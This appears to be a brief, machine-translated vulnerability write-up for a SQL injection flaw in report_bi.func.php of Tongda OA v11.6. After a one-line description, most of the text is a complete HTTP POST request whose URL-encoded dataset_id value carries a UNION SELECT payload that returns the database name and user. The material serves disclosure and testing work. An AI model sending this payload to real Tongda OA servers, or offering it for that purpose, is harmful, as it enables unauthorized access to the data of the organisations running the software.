Tongda Oa V11 6 Report_bi Func Php Sql Injection Vulnerability
Tongda Oa V11 6 Report_bi Func Php Sql Injection Vulnerability
Tongda OA v11.6 report_bi.func.php SQL injection vulnerability
Vulnerability Description
Tongda OA v11.6 report_bi.func.php has a SQL injection vulnerability, and attackers can obtain database information through the vulnerability.
Vulnerability Impact
Tongda OA v11.6
Network surveying and mapping
Vulnerability reappears
Login page
Send request packet to execute SQL statement
1
2
3
4
5
6
7
8
POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 113
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
This post is licensed under CC BY 4.0 by the author.